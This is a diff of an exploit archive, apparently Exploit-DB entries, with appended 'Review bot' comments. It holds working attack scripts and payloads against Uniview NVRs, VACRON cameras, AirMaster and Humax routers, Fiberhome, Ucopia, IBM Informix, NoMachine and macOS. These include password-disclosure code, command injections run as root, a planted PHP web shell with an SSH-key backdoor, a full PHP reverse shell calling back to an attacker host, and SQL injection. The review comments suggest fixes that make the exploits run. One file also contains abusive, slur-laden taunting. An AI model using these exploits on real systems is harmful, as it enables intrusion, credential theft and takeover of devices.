# If the script does retrieve the hash and not the password, you can intercept the request and replace the generated
# MD5 with the one disclosed using this script
# Tested on the following models:
# NVR304-16E - Software Version B3118P26C00510
# NVR301-08-P8 - Software Version B3218P26C00512
#=09=09=09=09=09=09and version B3220P11
#
# Other versions may also be affected
#Usage: python nvr-pwd-disc.py http://Host_or_IP:PORT
# Run example:
# root@k4li:~# python nvr-pwd-disc.py http://192.168.1.5
#
# Uniview NVR remote passwords disclosure!
# Author: B1t
#
# [+] Getting model name and software version...
# Model: NVR301-08-P8
# Software Version: B3218P26C00512
#
# [+] Getting configuration file...
# [+] Number of users found: 4
#
# [+] Extracting users' hashes and decoding reversible strings:
#
# User =09|=09 Hash =09|=09 Password
# _________________________________________________
# admin =09|=093b9c687b1f4b9d87ed0fdd6abbf7e33d =09|=09<TRIMMED>
# default =09|=09 =09|=09||||||||||||||||||||
# HAUser =09|=09288b836a37578141fea6527b5e190120 =09|=09123HAUser123[err
# test =09|=0951b2454c681f3205f63b8372096d990b =09|=09AA123pqrstuvwxyz
#
# *Note that the users 'default' and 'HAUser' are default and sometimes in=
accessible remotely
import requests
import xml.etree.ElementTree
import sys
print "\r\nUniview NVR remote passwords disclosure!"
print "Author: B1t\r\n"
def decode_pass(rev_pass):
pass_dict =3D {'77': '1', '78': '2', '79': '3', '72': '4', '73': '5', '=
74': '6', '75': '7', '68': '8', '69': '9',
'76': '0', '93': '!', '60': '@', '95': '#', '88': '$', '89=
': '%', '34': '^', '90': '&', '86': '*',
'84': '(', '85': ')', '81': '-', '35': '_', '65': '=3D', '=
87': '+', '83': '/', '32': '\\', '0': '|',
'80': ',', '70': ':', '71': ';', '7': '{', '1': '}', '82':=
'.', '67': '?', '64': '<', '66': '>',
'2': '~', '39': '[', '33': ']', '94': '"', '91': "'", '28'=
: '`', '61': 'A', '62': 'B', '63': 'C',
'56': 'D', '57': 'E', '58': 'F', '59': 'G', '52': 'H', '53=
': 'I', '54': 'J', '55': 'K', '48': 'L',
'49': 'M', '50': 'N', '51': 'O', '44': 'P', '45': 'Q', '46=
': 'R', '47': 'S', '40': 'T', '41': 'U',
'42': 'V', '43': 'W', '36': 'X', '37': 'Y', '38': 'Z', '29=
': 'a', '30': 'b', '31': 'c', '24': 'd',
'25': 'e', '26': 'f', '27': 'g', '20': 'h', '21': 'i', '22=
': 'j', '23': 'k', '16': 'l', '17': 'm',
'18': 'n', '19': 'o', '12': 'p', '13': 'q', '14': 'r', '15=
': 's', '8': 't', '9': 'u', '10': 'v',
'11': 'w', '4': 'x', '5': 'y', '6': 'z'}
rev_pass =3D rev_pass.split(";")
pass_len =3D len(rev_pass) - rev_pass.count("124")
password =3D ""
for char in rev_pass:
if char !=3D "124": password =3D password + pass_dict[char]
return pass_len, password
if len(sys.argv) < 2:
print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The =
web interface's port"
print "\r\nExample: " + sys.argv[0] + " http://192.168.1.1:8850"
sys.exit()
elif "http://" not in sys.argv[1] and "https://" not in sys.argv[1]:
=09print "Usage: " + sys.argv[0] + " http://HOST_or_IP:PORT\r\n PORT: The w=
eb interface's port"
=09sys.exit()
=09
host =3D sys.argv[1]
print "[+] Getting model name and software version..."
r =3D requests.get(host + '/cgi-bin/main-cgi?json=3D{"cmd":%20116}')
if r.status_code !=3D 200:
print "Failed fetching version, got status code: " + r.status_code
print "Model: " + r.text.split('szDevName":=09"')[1].split('",')[0]
print "Software Version: " + r.text.split('szSoftwareVersion":=09"')[1].spl=
it('",')[0]
print "\r\n[+] Getting configuration file..."
r =3D requests.get(host + "/cgi-bin/main-cgi?json=3D{%22cmd%22:255,%22szUse=
rName%22:%22%22,%22u32UserLoginHandle%22:8888888888}")
if r.status_code !=3D 200:
print "Failed fetching configuration file, response code: " + r.status_=
code
sys.exit()
root =3D xml.etree.ElementTree.fromstring(r.text)
print "[+] Number of users found: " + root.find("UserCfg").get("Num")
print "\r\n[+] Extracting users' hashes and decoding reversible strings:"
users =3D root.find("UserCfg").getchildren()
print "\r\nUser \t|\t Hash \t|\t Password"
print "_________________________________________________"
for user in users:
l, p =3D decode_pass(user.get("RvsblePass"))
print user.get("UserName"), "\t|\t", user.get("UserPass"), "\t|\t", p
print "\r\n *Note that the users 'default' and 'HAUser' are default and som=
etimes inaccessible remotely"
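Review bot: The file was committed with quoted-printable encoding intact: `=3D` stands for `=`, `=09` for a tab, and the trailing `=` at the end of the wrapped `pass_dict` lines and of the two `print "Usage: ..."` lines is a soft line break, so the script is not valid Python until it is decoded (for example with `python -m quopri -d`) and the wrapped lines are rejoined. Separately, on the first error path `print "Failed fetching version, got status code: " + r.status_code` concatenates a `str` with the `int` status code and raises `TypeError` instead of printing, and unlike the configuration-file check it is not followed by `sys.exit()`, so execution continues into the `split()` calls on an unexpected body; wrap the code in `str()` and exit there.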


@ -0,0 +1,11 @@
# Exploit Title: IP Camera VACRON VIG-US731VE
# Date: 2017-07-18
# Exploit Author: anonymous
# Vendor Homepage: www.vacron.com
# Version: V1.0.18-09-B727
1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg
2. allows "viewer" level user to fetch any camera setting, eg admin user and password: http://192.168.0.200/vb.htm?adminid&adminpwd
there is newer firmware available from the vendor, but I haven't tested on that one.
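Review bot: The two numbered findings are different weaknesses and should be titled and rated separately: item 1 is a missing authentication check on the `/ipcam/jpeg` snapshot endpoint, while item 2 is a missing authorization check on `/vb.htm` that lets a "viewer"-level account read the administrator credentials, which is the higher-impact one and the one a vendor fix should prioritise. The header also lacks the `# Tested on` and `# Software Link` fields the other advisories in this commit carry, and "there is newer firmware available from the vendor" should name that firmware version so readers can tell whether their device is covered.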


@ -0,0 +1,50 @@
<?php
# Exploit Title: AirMaster 3000M multiple Vulnerabilities
# Date: 2017/08/12
# Exploit Author: Koorosh Ghorbani
# Author Homepage: http://8thbit.net/
# Vendor Homepage: http://mobinnet.ir/
# Software Version: V2.0.1B1044
# Web Server: GoAhead-Webs/2.5.0
define('isDebug',false);
define('specialCookie','Cookie: kz_userid=Administrator:1'); //Special Cookie which allow us to execute commands without authentication
function changePassword(){
$pw = "1234"; //New Password
$data = "admuser=Administrator&admpass=$pw&admConfirmPwd=$pw" ;
$ch = curl_init('http://192.168.1.1/goform/setSysAdm');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
specialCookie,
'Origin: http://192.168.1.1',
'Content-Type: application/x-www-form-urlencoded',
));
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$response = curl_exec($ch);
if($response == "success"){
echo "New Password is : $pw\r\n";
}else{
echo "Failed\r\n";
}
if (isDebug){
echo $response;
}
}
function executeCommand(){
$data = "pingAddr=`cat /etc/passwd`";
$ch = curl_init('http://192.168.1.1/goform/startPing');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
specialCookie,
'Origin: http://192.168.1.1',
'Content-Type: application/x-www-form-urlencoded',
"X-Requested-With: XMLHttpRequest",
"Referer: http://192.168.1.1/diagnosis_ping.asp"
));
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$response = curl_exec($ch);
echo $response; //ping: bad address 'admin:XGUaznXz1ncKw:0:0:Adminstrator:/:/bin/sh'
}
changePassword();
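Review bot: Only `changePassword();` is invoked at the bottom of the script; `executeCommand()` is defined but never called, so as committed it is dead code and the header should say what the script actually does when run. The target `http://192.168.1.1`, the cookie value and the new password `$pw = "1234"` are hardcoded rather than taken from arguments, and a failed `curl_exec()` returns `false`, which the `$response == "success"` comparison reports as a generic "Failed" without printing `curl_error($ch)`. The `# Exploit Author: Koorosh Ghorbani` header also does not match the author `"Mr.8Th BiT"` recorded for id 42450 in files.csv; the `8thbit.net` homepage suggests the same person, but the index and the file should agree.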


@ -0,0 +1,56 @@
# coding: utf-8
# Exploit Title: Humax HG100R-* Authentication Bypass
# Date: 14/09/2017
# Exploit Author: Kivson
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-11435
# The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
# crafted requests to the management console. The bug is exploitable remotely when the router is configured to
# expose the management console.
# The router is not validating the session token while returning answers for some methods in url '/api'.
# An attacker can use this vulnerability to retrieve sensitive information such
# as private/public IP addresses, SSID names, and passwords.
import sys
import requests
def print_help():
print('Exploit syntax error, Example:')
print('python exploit.py http://192.168.0.1')
def exploit(host):
print(f'Connecting to {host}')
path = '/api'
payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
response = requests.post(host + path, data=payload)
response.raise_for_status()
if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
response.json()['result']['WiFi_Info']:
print('Error, target may be no exploitable')
return
for wlan in response.json()['result']['WiFi_Info']['wlan']:
print(f'Wifi data found:')
print(f' SSID: {wlan["ssid"]}')
print(f' PWD: {wlan["password"]}')
def main():
if len(sys.argv) < 2:
print_help()
return
host = sys.argv[1]
exploit(host)
if __name__ == '__main__':
main()
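Review bot: The script uses f-strings (`print(f'Connecting to {host}')` and the three `print(f'...')` lines in the wlan loop), so it requires Python 3.6 or later, yet the usage text says `python exploit.py http://192.168.0.1` and the `# coding: utf-8` header reads like a Python 2 script; the interpreter requirement should be stated, or the usage changed to `python3`. `print(f'Wifi data found:')` is an f-string with no placeholders and can be a plain string. `response.json()` is parsed four times across the `if` condition and the `for` loop; assign it once (`data = response.json()`) and the condition becomes readable. `exploit()` also does not normalise `host`, so a trailing slash in the argument yields `http://192.168.0.1//api`; `host.rstrip('/')` would cover that.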


@ -0,0 +1,38 @@
# Exploit Title: Fiberhome an5506-04-f -PING- COMMAND INJECTION
# Date: 03.10.2017
# Exploit Author: Tauco
# Vendor Homepage: http://hk.fiberhomegroup.com
# Version: RP2609
# Tested on: Windows 10
Description:
===========================================================================
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
https://www.owasp.org/index.php/Command_Injection
Proof of Concepts :
=======================================
1. Go to the Default Gateway
2. Open the application
3. Open diagnosis
4. Input command to the Destination Address
5. Click Ping
ping_ip=127.0.0.1;whoami;id
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.617 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.259 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.215 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.214 ms
64 bytes from 127.0.0.1: seq=4 ttl=64 time=0.218 ms
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.214/0.304/0.617 ms
root
uid=0(root) gid=0 groups=0
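Review bot: The Description section reproduces OWASP's generic definition of command injection but never says where this device is affected; the PoC shows it is the `ping_ip` field of the diagnosis page being passed to a shell unsanitised (`ping_ip=127.0.0.1;whoami;id`), and the output `uid=0(root) gid=0 groups=0` shows the web interface executes the command as root. Both facts belong in the description since they determine the severity and tell an operator what to look for in the firmware. `# Tested on: Windows 10` names the client used for the test rather than the device firmware (`RP2609` is already in the Version field) and should be clarified or dropped, and the header has no `# CVE` line, which several other advisories in this commit include even when it is `N/A`.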


@ -0,0 +1,17 @@
# Exploit Title: Unauthenticated remote root code execution on captive
portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network
# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27

platforms/linux/webapps/42187.py Executable file

@ -0,0 +1,283 @@
#!/usr/local/bin/python
"""
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Bonus: free XXE bug included!
Download: https://www-01.ibm.com/marketing/iwm/iwm/web/reg/download.do?source=swg-informixfpd&S_PKG=dl&lang=en_US&cp=UTF-8&dlmethod=http
Twitter: https://twitter.com/rgod777
Found by: IMgod aka rgay
About:
~~~~~~
So after Andrea Micalizzi decided to audit this software and found some bugs I decided to audit it too. (see https://blogs.securiteam.com/index.php/archives/3210)
What's that? Where is all your main frame, super 1337 hacks now rgod? Why did you miss these 3 bugs?
- unauthed XXE
- unauthed SQLi
- unauthed RCE
Your ub3r 31337 PHP hacks are soooooooooooo cool, maybe you should commit seppuku again. Or maybe you should have taken one of the 143 jobs you were offered? Cos I'm about to rekt dis cunt.
Vulnerable Code:
~~~~~~~~~~~~~~~~
Of course, rgod misses this bug in openadmin/admin/index.php:
$admin->run(); // 1. calls run()
$idsadmin->html->render();
function run()
{
if ( isset ( $this->idsadmin->in['helpact'] )
&& $this->idsadmin->in['do'] != "doedithelp"
&& $this->idsadmin->in['do'] != "doaddhelp" )
{
header("Location: {$this->idsadmin->get_config("BASEURL")}/index.php?act=help&helpact={$this->idsadmin->in['helpact']}&helpdo={$this->idsadmin->in['helpdo']}");
die();
}
if ( isset($this->idsadmin->in['lang']) )
{
// If the user has changed the language, set the new language now.
$this->idsadmin->validate_lang_param();
$this->idsadmin->phpsession->set_lang($this->idsadmin->in['lang']);
}
switch( $this->idsadmin->in['do'] ) // 2. switch our do parameter
{
case "getconnections":
if ( ! isset($this->idsadmin->in['group_num']) )
{
$grpnum = 1;
}
else
{
$grpnum = $this->idsadmin->in['group_num'];
}
$this->getconnections($grpnum);
break;
...
case "doconfig":
$this->idsadmin->html->set_pagetitle($this->idsadmin->lang("OATconfig"));
$this->doconfig(); // 3. calls doconfig
break;
Now, onto the doconfig function:
function doconfig()
{
// None of the config parameters can contain quotes.
foreach ($this->idsadmin->in as $i => $v)
{
if (strstr($v,"\"") || strstr($v,"'"))
{
$this->idsadmin->load_lang("global");
$this->idsadmin->error($this->idsadmin->lang("invalidParamNoQuotes",array($i)));
$this->config();
return;
}
}
$conf_vars = array (
"LANG" => $this->idsadmin->lang("LANG")
,"CONNDBDIR" => $this->idsadmin->lang("CONNDBDIR")
,"BASEURL" => $this->idsadmin->lang("BASEURL")
,"HOMEDIR" => $this->idsadmin->lang("HOMEDIR")
,"HOMEPAGE" => $this->idsadmin->lang("HOMEPAGE")
,"PINGINTERVAL" => $this->idsadmin->lang("PINGINTERVAL")
,"ROWSPERPAGE" => $this->idsadmin->lang("ROWSPERPAGE")
,"SECURESQL" => $this->idsadmin->lang("SECURESQL")
,"INFORMIXCONTIME" => $this->idsadmin->lang("INFORMIXCONTIME")
,"INFORMIXCONRETRY" => $this->idsadmin->lang("INFORMIXCONRETRY")
);
# create backup of file
$src=$this->idsadmin->get_config('HOMEDIR')."/conf/config.php";
$dest=$this->idsadmin->in['HOMEDIR']."/conf/BAKconfig.php";
copy($src,$dest);
# open the file
if (! is_writable($src))
{
$this->config($this->idsadmin->lang("SaveCfgFailure"). " $src");
return;
}
$fd = fopen($src,'w+'); // 4. get a handle to a php file
# write out the conf
fputs($fd,"<?php \n");
foreach ($conf_vars as $k => $v)
{
if ($k == "CONNDBDIR" || $k == "HOMEDIR")
{
// Replace backslashes in paths with forward slashes
$this->idsadmin->in[$k] = str_replace('\\', '/', $this->idsadmin->in[$k]);
}
$out = "\$CONF['{$k}']=\"{$this->idsadmin->in[$k]}\"; #{$v}\n"; // 5. dangerous
fputs($fd,$out); // 6. PHP Injection
}
fputs($fd,"?>\n");
fclose($fd);
$this->idsadmin->html->add_to_output($this->idsadmin->template["template_global"]->global_redirect($this->idsadmin->lang("SaveCfgSuccess"),"index.php?act=admin"));
} #end config
I suspect Andrea missed this bug because of this code:
// None of the config parameters can contain quotes.
foreach ($this->idsadmin->in as $i => $v)
{
if (strstr($v,"\"") || strstr($v,"'")) // check for double quotes
{
$this->idsadmin->load_lang("global");
$this->idsadmin->error($this->idsadmin->lang("invalidParamNoQuotes",array($i)));
$this->config();
return;
}
}
I'm sure his assumption was that if you can't break out of the double quotes, you can't get RCE. Well, MR I have 40 years experiance.
Example:
~~~~~~~~
sh-3.2$ ./poc.py
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Found By: IMgod aka rgay
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.1.172 192.168.1.1:1111
sh-3.2$ ./poc.py 192.168.1.172 192.168.1.1:1111
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Found By: IMgod aka rgay
(+) PHP code injection done!
(+) starting handler on port 1111
(+) connection from 172.16.175.172
(+) popping a shell!
id
uid=2(daemon) gid=2(daemon) groups=1(bin),2(daemon)
uname -a
Linux informixva 2.6.27.39-0.3-pae #1 SMP 2009-11-23 12:57:38 +0100 i686 i686 i386 GNU/Linux
"""
import sys
import requests
import telnetlib
import socket
from threading import Thread
from base64 import b64encode as b64e
def banner():
return """\n\tIBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)\n\tFound by: IMgod aka rgay\n"""
def check_args():
global t, ls, lp
if len(sys.argv) < 3:
return False
t = "http://%s/openadmin/admin/index.php?act=admin&do=doimport" % sys.argv[1]
ls = sys.argv[2].split(":")[0]
lp = int(sys.argv[2].split(":")[1])
return True
def handler(lport):
print "(+) starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) popping a shell!"
t.interact()
# build the reverse php shell
def build_php_code():
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (ls, lp))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (ls, lp))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
return phpkode
def suntzu_omfg_no_one_can_steal_my_software_yo():
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
target = "http://127.0.0.1/openadmin/conf/config.php?c=eval%%28base64_decode%%28%%27%s%%27%%29%%29%%3b" % b64e(build_php_code())
p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
r = requests.post("%s" % t, files=f)
def suntzu_omfg_i_am_40_years_old_and_fuckn_fat():
target = "http://127.0.0.1/openadmin/admin/index.php?act=admin&do=doconfig&LANG=en_US&BASEURL=http%3A%2F%2Flocalhost%3A80%2Fopenadmin&HOMEDIR=%2Fopt%2FIBM%2FOpenAdmin%2FOAT%2FApache_2.4.2%2Fhtdocs%2Fopenadmin%2F&CONNDBDIR=%2Fopt%2FIBM%2FOpenAdmin%2FOAT%2FOAT_conf%2F&HOMEPAGE=%7b%24%7beval%28%24_GET%5bc%5d%29%7d%7d&PINGINTERVAL=300&ROWSPERPAGE=25&SECURESQL=on&INFORMIXCONTIME=20&INFORMIXCONRETRY=3&dosaveconf=Save"
p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
r = requests.post("%s" % t, files=f)
if r.status_code == 200:
return True
return False
def main():
print banner()
if not check_args():
print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
print "(+) eg: %s 192.168.1.172 192.168.1.1:1111" % sys.argv[0]
sys.exit()
if suntzu_omfg_i_am_40_years_old_and_fuckn_fat():
print "(+) PHP code injection done!"
suntzu_omfg_no_one_can_audit_my_software_yo()
if __name__ == '__main__':
main()
"""
Bonus bug SQL Injection!
POST /openadmin/admin/index.php?act=admin&do=doimport HTTP/1.1
Host: 192.168.1.172
Connection: close
Content-Type: multipart/form-data; boundary=--------1366435377
Content-Length: 258
----------1366435377
Content-Disposition: form-data; name="importfile"; filename="rektGOD.txt"
Content-Type: text/plain
<?xml version="1.0" encoding="ISO-8859-1"?>
<root><group name="rgay' or '1'=(select '1') -- "></group></root>
----------1366435377--
"""

platforms/osx/local/42460.py Executable file

@ -0,0 +1,42 @@
"""
# Exploit Title: NoMachine LPE - Local Privilege Escalation
# Date: 09/08/2017
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: https://www.nomachine.com
# Software Link: https://www.nomachine.com
# Version: 5.3.9
# Tested on: OSX
# CVE : CVE-2017-12763
NoMachine uses a file called nxexec in order to execute different action as super user, nxexec allow to execute
sh files within a sandboxed path, additionally other checks such as parent process name, parent process path are
performed in order to be sure only NoMachine application are allowed to execute nxexec.
nxnode.bin allow to spoof a local path via NX_SYSTEM environment variable, this is use to craft a path where a perl
file will be executed, this PoC exploit the NX_SYSTEM variable in order to allow a custom perl file to call nxexec
and execute privileged nxcat.sh script in order to read any file on filesystem.
"""
import os
import sys
print "[!] NoMachine - EoP - Read any file by @dzonerzy"
if len(sys.argv) == 4:
nxnode = sys.argv[1]
nxexec = sys.argv[2]
toread = sys.argv[3]
user = os.environ.get("USER")
tmp_path = "/tmp/lib/perl/nxnode"
tmp_file = "/tmp/lib/perl/nxnode/nxnode.pl"
tmp_file_content = "print \"[*] Exploiting vulnerability\\n\";" \
"system(\"{0} " \
"nxcat.sh 1 {1} 2 '../../../../../..{2}'\");".format(nxexec, user, toread)
print "[*] Crafting tmp environment"
os.system("mkdir -p {0}".format(tmp_path))
with open(tmp_file,"w") as tmp:
tmp.write(tmp_file_content)
tmp.close()
os.system("NX_SYSTEM=/tmp {0}".format(nxnode))
os.unlink(tmp_file)
os.system("rm -r /tmp/lib")
else:
print "Usage: {0} <path of nxnode.bin> <path of nxexec> <file to read>".format(sys.argv[0])
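Review bot: the header records `# CVE : CVE-2017-12763` and `# Version: 5.3.9` but no fixed release, so a reader can't tell which NoMachine version closes the hole; add the vendor's fix reference. In the script, `tmp.close()` inside the `with open(tmp_file,"w") as tmp:` block is redundant. For anyone checking a host, the PoC's observable footprint is a `/tmp/lib/perl/nxnode/nxnode.pl` file and `nxnode.bin` started with `NX_SYSTEM=/tmp`, both worth listing as indicators.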

platforms/osx/local/42948.txt Executable file

@ -0,0 +1,178 @@
Title: Mac OS X Local Javascript Quarantine Bypass
Product: Mac OS X
Version: 10.12, 10.11, 10.10 and probably prior
Vendor: apple.com <http://apple.com/>
Type: DOM Based XSS
Risk level: 3 / 5
Credits: filippo.cavallarin@wearesegment.com <mailto:filippo.cavallarin@wearesegment.com>
CVE: N/A
Vendor notification: 2017-07-15
Vendor fix: 2017-09-25
Public disclosure: 2017-09-28
DETAILS
Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary
Javascript code without restrictions.
Basically, Apple's Quarantine works by setting an extended attribute to downloaded files (and also to files
extracted from downloaded archive/image) that tells the system to open/execute those files in a restricted
environment. For example, a quarantined html file won't be able to load local resources.
The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the
excution of arbitrary javascript commands in its (unrestricted) context.
The mentioned file is located at /System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html
and contains the following code:
<script type="text/javascript" charset="utf-8">
setBasePathFromString(urlParam("rhtml"));
loadLocStrings();
loadJavascriptLibs();
function init () { /* <-- called by <body onload="init()" */
[...]
rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */
[...]
self.contentHttpReq.open('GET', rHTMLPath, true);
self.contentHttpReq.onreadystatechange = function() {
if (self.contentHttpReq.readyState == 4) {
loadTutorial(self.contentHttpReq.responseText);
}
}
[...]
}
function loadTutorial(response) {
var rHTMLPath = urlParam("rhtml");
// this will create a tutorialData item
eval(response);
[...]
}
function loadLocStrings()
{
var headID = document.getElementsByTagName("head")[0];
var rHTMLPath = urlParam("rhtml");
rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js");
var newScript = document.createElement('script');
newScript.type = 'text/javascript';
newScript.src = rHTMLPath;
headID.appendChild(newScript);
}
[...]
</script>
In short, it takes an url from the "rhtml" query string parameter, makes a request to that url and evaluates
the response content as javascript code.
The code below contains two different DOM Based XSS.
The first is in the loadLocStrings() function that creates a SCRIPT element and uses the "rhtml" parameter as
its "src" property.
The second is in the init() function that uses the "rhtml" parameter to make an ajax call and then passes the
response directly to eval().
As the result the same payload is executed twice.
An attacker, by providing a data uri, can take control of the response and thus what gets evaluated.
One possile vector of exploitation are the .webloc files. Basically those files contain an url and they simply loads
it in Safari when opened.
By crafting a .webloc file and by tricking a victim to open it, an attacker can run privileged javascript commands on
the victim's computer.
Due to the fact that .webloc files also use an extended attribute to store data, they must be sent contained in a tar
archive (or any other format that supports extended attributes).
PROOF OF CONCEPT
To reproduce the issue follow the steps below:
1. create a javascript file you want to execute on your target
2. convert its content to base64
3. encode it to a "uri component" (ex with encodeURIComponent js function)
4. use it to build a data uri as follow:
data:text/plain;base64,<urlencoded base64>
5. prepend the following string to it:
file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>
6. open it with Safari
7. save it as a bookmark
8. drag the bookmark to the Finder (a .webloc file is created, if the extension is not .webloc, rename it)
9. create a tar archive containing the .webloc file
10. send it to the victim
Note that due to the behaviour of rhtmlPlayer.html, in order to access local resources, the first line of the
javascript code must be: document.getElementsByTagName("base")[0].href="";
The following bash script will take a javascript file and converts it to final "file" url:
BOF
#!/bin/bash
BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>"
BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;"
DATAURI="data:text/plain;base64,"
JSFILE=$1
if [ "$JSFILE" = "" ]; then
echo "usage: $0 <jsfile>"
exit 1
fi
JS=$BASEJS`cat $JSFILE`"})();"
ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'`
URL="$BASEURL""$DATAURI""$ENCJS"
